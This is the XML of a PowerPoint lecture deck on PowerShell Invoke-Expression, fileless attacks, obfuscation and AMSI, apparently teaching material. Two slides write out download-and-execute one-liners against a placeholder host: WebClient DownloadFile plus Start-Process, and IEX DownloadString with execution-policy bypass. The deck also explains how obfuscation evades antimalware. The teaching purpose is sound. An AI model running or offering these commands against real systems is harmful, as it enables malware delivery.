              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, which represents the current object. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>it were enclosed in double quotation marks, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> variable would be replaced by its value before it was saved in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Example 3: Run a command in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>variable</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2011610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07504" y="2564904"/>
            <a:ext cx="8928992" cy="3744416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>script opens an external connection in order to download and execute a malicious binary file from a specific URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(’http://www.demo.local/cybad.exe’,”$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env:APPDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\cybad.exe”) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Start-Process(“$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>env:APPDATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\cybad.exe”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Explanation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>New-Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>– prepares the initialized web client to download the payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Start-Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>– allows running the downloaded payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2655904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1521" y="2675466"/>
            <a:ext cx="8568952" cy="3633854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell.exe – exec bypass – C “IEX(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(’http://www.demo.local/cybad.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’)”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The script is not saved on the disk but is rather loaded directly to memory by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> cmdlet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> parameter instructs the PowerShell command to ignore (bypass) the execution policies in order to allow the command to be executed remotely. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Attack Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242858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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Attackers often use various obfuscation techniques to hide most of the command and slow down analyst investigation. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Obfuscation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is the default way to make malicious code unreadable, not only to the human researcher but also to the various antimalware products that can hardly afford themselves the downtime that’s entailed in real time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>deobfuscation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to reveal a payload’s actual intent.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Obfuscation             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Max </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Malyutin</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37515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4171745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1960</TotalTime>
  <Words>763</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>158</Paragraphs>
  <Slides>29</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>佈景主題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>投影片標題</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>29</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="30" baseType="lpstr">
      <vt:lpstr>波形</vt:lpstr>
      <vt:lpstr>Invoke-Expression [Microsoft]</vt:lpstr>
      <vt:lpstr>Syntax </vt:lpstr>
      <vt:lpstr>Description</vt:lpstr>
      <vt:lpstr>Example 1: Evaluate an Expression</vt:lpstr>
      <vt:lpstr>Example 2: Run a script on the local computer</vt:lpstr>
      <vt:lpstr>Example 3: Run a command in a variable</vt:lpstr>
      <vt:lpstr>Simple Powershell Example       [Max Malyutin]</vt:lpstr>
      <vt:lpstr>Powershell Fileless Attack Example [Max Malyutin]</vt:lpstr>
      <vt:lpstr>Powershell and Obfuscation             [Max Malyutin]</vt:lpstr>
      <vt:lpstr>PowerShell Execution Options        [Max Malyutin]</vt:lpstr>
      <vt:lpstr>Most Common PowerShell Obfuscation Techniques [Max Malyutin]</vt:lpstr>
      <vt:lpstr>Concatenation</vt:lpstr>
      <vt:lpstr>Reordering</vt:lpstr>
      <vt:lpstr>Escaping Character</vt:lpstr>
      <vt:lpstr>Base64 Format</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>AMSI Flowchart [PENTEST LABORATORIES]</vt:lpstr>
      <vt:lpstr>How AMSI Works [Raj Chandel]</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Environment Variables [Microsoft] </vt:lpstr>
      <vt:lpstr>Environment Drive [Microsoft] </vt:lpstr>
      <vt:lpstr>Drives Env: [Microsoft] </vt:lpstr>
      <vt:lpstr>PowerShell Environment Provider [Microsoft] </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Malicious PowerShell in the Registry: Persistence [Mari DeGrazia]</vt:lpstr>
      <vt:lpstr>Content of Key Value Data [Mari DeGrazia]</vt:lpstr>
      <vt:lpstr>Key Value Data  Content of HKLM:Software\4MX64uqR [Mari DeGrazia]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Fu-Hau H</dc:creator>
  <cp:lastModifiedBy>Fu-Hau H</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-27T06:44:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-29T03:32:05Z</dcterms:modified>
</cp:coreProperties>
</file>